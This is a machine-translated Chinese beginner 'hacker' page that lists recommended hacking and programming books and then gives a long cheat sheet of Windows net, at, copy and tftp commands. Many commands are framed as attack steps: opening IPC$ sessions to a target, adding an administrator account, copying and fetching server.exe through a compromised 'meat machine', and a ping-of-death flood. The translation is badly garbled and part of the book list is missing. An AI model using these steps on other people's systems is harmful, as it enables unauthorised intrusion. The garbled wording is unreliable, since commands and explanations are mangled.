This is the first hacker book I read, which is a relatively elementary hacker knowledge, but the following example is applied to html code, mainly about
Web pages infringe on knowledge, and I didn't understand that myself at that time, so I went to learn html (in fact, I just looked at the code, myself).
I can't write any code at all, hehe ...)
2.30 days to build a professional honker.
Any book that says it takes a few days to master and a few days to speed up is actually not credible, but this is not the problem we are going to talk about now. this book
It can make up for the deficiency of the last book, and some contents in it may be more detailed and suitable for beginners.
3. Anti-black files
This book was written by a floating cloud in the East. Looks like the deputy commander of the Green Corps. Hehe, I'll cover it first .........
4. Introduction to Hacker Attack and Defense
This is a hacker book with actual combat as the main line, which is highly recommended! ! ! Computer technology must be improved in practice, and only by relying on it.
Theory doesn't work. You can read this book and operate it at the same time. I believe it will help your actual combat ability.
These are some books about hackers, some of which are the same. You can choose a good one and do it! ! !
5. "C Language Programming"
People who don't learn programming can never be hackers, so learning programming has become the only way for us to learn the underworld, and it is also the most necessary.
The process of strength and endurance. This is a book written by Tan Haoqiang. You can also look at the c programe language written by foreigners.
If you can debug all the codes in the book by yourself, it should not be a problem to master the basic knowledge of C language.
6. VC++in-depth explanation
This is a book written by others according to Sun Xin's video tutorial, so this book also has its supporting video. The address is as follows:
/special/0009 159 f/VC . html
7.IBM-PC assembly language programming
This is published by Tsinghua University. Although a little outdated, it belongs to the era of 16 bit machine. It is slightly different from Win32 and Win64, but its version is
The quality is similar. I believe compilation is also a compulsory course for comrades who want to learn reverse analysis. You can read this book.
Looking at the video course of assembly language in Sun Yat-sen University, the teaching method is relatively novel. You can tell at a glance that the address is as follows:
/disp BBS _ 12 1 _ 164375 _ 1 . html
If you want to watch the online video, you can check it at the following address: founders Greg Hoglund and James Butler tell you in detail how the attacker was.
Entering the system and staying undetected for a long time, and how hackers destroy Windows XP and Windows 2000 kernel systems,
Its concept can be applied to any modern mainstream operating system. Through this book, readers can fully master rootkit and improve their computer security.
Preventive ability.
18.0Day Security: software vulnerability analysis technology
It was just published in April, and I watched the Snow Forum. I have seen some good studies and it is suitable for comrades who are interested in spillovers. I want to tell you some common sense … although a lot, it is basic! I hope you can study hard!
DOS command
Net uses ipipc$ ""/user: ""to establish ipc null link.
Net uses ipipc$ "password" /user: "user name" to establish ipc non-empty link.
Net uses h: ipc$ "password"/user: "user name" to log in directly and map to the other party. C: it's h:
Net uses h: ipc$ to log in to C: and then maps the other party to the local area, which is H:
Net uses ipipc$ /del to delete ipc links.
Net uses h: /del to delete the mapping from the other side to the local area, and the name is h:
Net user name password/Add to create a user.
Network User Guest/Activity: Yes, the guest user is activated.
Net users to see which users are there.
Net user account name to view the properties of the account.
Net localgroup administrators user name /add adds "user" to the administrator, giving him administrator rights. note:
Administrator followed by the plural s.
Net to see which services are turned on.
The net start service name starts the service; (e.g. network startup remote login, network startup schedule)
Network Stop Service Name Stop Service.
Net time target ip checks each other's time.
Net time target ip /set sets the time synchronization between the local computer and the "target ip" host, and adds the parameter /yes to cancel the confirmation information.
Check which * * * privileges are enabled in the local LAN.
Net to check the ip, and see which * * * permissions are opened in the local area network of the other party.
Network Configuration Displays the system network settings.
Network offline disconnect * * * Enjoy
Net pause service name pause service.
Net send ip "SMS" sends a message to the other party.
The network connection type and information are used for the network.
Share online to see the local enjoyment.
Net share ipc$ Open ipc$*** Enjoy.
Net share ipc$ /del Delete ipc$***
Net share c$ /del Delete c:* * * * Enjoy.
Net user guest 12345 logs in and changes the password to 12345.
Net password password changes the system login password.
Netstat -a to see which ports are open. Netstat -an is often used.
Netstat -n checks the network connection of the port, usually netstat -an.
View the work in progress
Example of netstat -p protocol name: netstat -p tcq/ip view the usage of the protocol (view the usage of tcp/ip protocol).
Netstat -s checks the usage of all the protocols in use.
One of the ip ports of Nbtstat -A ip opposite party 136 to 139 is open, so you can view the user name that the opposite party recently logged in (user name before 03)-Note: the parameter -A should be capitalized.
Tracert- parameter ip (or computer name) tracks the route (packet), and parameter: "-w number" is used to set the timeout interval.
Ping ip (or domain name) sends data with a default size of 32 bytes to the other host, and the parameter is "-l [space] packet size"; "-n times to send data"; "-t" means forever.
Ping.
Ping -t -l 65550 ip Ping of death (sending files larger than 64K and ping all the time becomes ping of death).
Ipconfig (winipcfg) is used for windows NT and XP(windows 95 98) to view the local ip address, and ipconfig can be used as a parameter.
The number "/all" shows all the configuration information.
Tlist -t displays processes in a tree-row list (it is an additional tool of the system, which is not installed by default and is located in the Support/tools folder of the installation directory).
Add the -F parameter to the kill -F process name to force a process to end (it is an additional tool of the system and is not installed by default, under the Support/tools folder of the installation directory).
Del -F file name can be deleted after adding the-f parameter. /AR, /AH, /AS and /AA respectively mean deleting read-only, hidden, system and archive files. /A-R and /A-
H, /A-S and /A-A mean deleting files other than read-only, hidden, system and archive files. For example, "DEL/AR *. * "means to delete all read-only files in the current directory," DEL/A-
S *。 * "means to delete all files except system files in the current directory.
Two:
Delete the /S /Q directory or use: rmdir /s /Q directory /S to delete the directory and all subdirectories and files under it. Use the parameter /Q to cancel the system when deleting.
Confirm the deletion directly. (Both commands have the same effect)
Move the drive path The file name to be moved stores the path of the moving file. After moving the file name, use the parameter /y to cancel the prompt, confirm that the same file exists in the moving directory, and overwrite it directly.
fc one . txt two . txt & gt; 3t.txt compares two files and outputs the differences to 3t.txt file. > > and > > This is a reoriented life.
manufacture
The at id number opens the registered scheduled task.
At /delete stops all scheduled tasks. Use the parameter /yes to stop directly without confirmation.
Stop the registered scheduled task on id number/deletion.
View all scheduled tasks.
At ip time, program name (or command) /r runs the other party's program at a certain time and restarts the computer.
Finger username @host to see which users have logged in recently.
Telnet ip port is far away from the login server, and the default port is 23.
Open ip connects to IP (command after IP(telnet login)
Telnet: Typing telnet directly on this machine will input Telnet on this machine.
Copy path file name 1 path file name 2 /y Copy the file 1 to the specified directory as file 2, and use the parameter /y to cancel confirmation. At the same time, you should overwrite the existing directory file.
Copy c:srv.exe ipadmin$ Copy the local c:srv.exe to the other party's admin.
Cppy 1st. jpg/b+2st. txt/a 3st.jpg hides the contents of 2st.txt in1st.jpg and generates a new file in 3st.jpg. note:
The header of 2st.txt file should have three blank lines. Parameters: /b refers to binary file, and /a refers to ASCLL format file.
Copy ipadmin$svv.exe c: or: copyipadmin$*. * copy other admini$*** (srv.exe files enjoyed by all texts.
) to local c:
Xcopy File or Directory Tree Destination Address Directory Name Copies the file and directory tree and overwrites the same file without prompting with the parameter/y.
TFTP- I obtained server.exe c: server.exe with my own IP (I used the meat machine IP when I used the meat machine as a springboard), and I will "IP" after logging in.
Server.exe downloads to the target host c:server.exe Parameters: -i means to transmit in binary mode, such as when transmitting EXE files, or transmit in ASCII mode without-i.
(transmission text file mode) for transmission.
Tftp -i IP put c:server.exe After logging in, upload the local c:server.exe to the host.
The ftp ip port is used to upload files to the server or perform file operations. The default port is 2 1. Bin refers to binary transmission (executable file entry); The default is ASCII format transmission (text
At the time of publication of this document)
Routing print shows IP routing, mainly showing network address, subnet mask and gateway address.
Address interface
Arp checks and processes the ARP cache. ARP stands for name resolution, which is responsible for resolving IP addresses into physical MAC addresses. Arp -a will display all the information.
Start the program name or command /max or /min to open a new window and maximize (minimize) the operation of the program or command. O (∩ _ ∩) O is expected.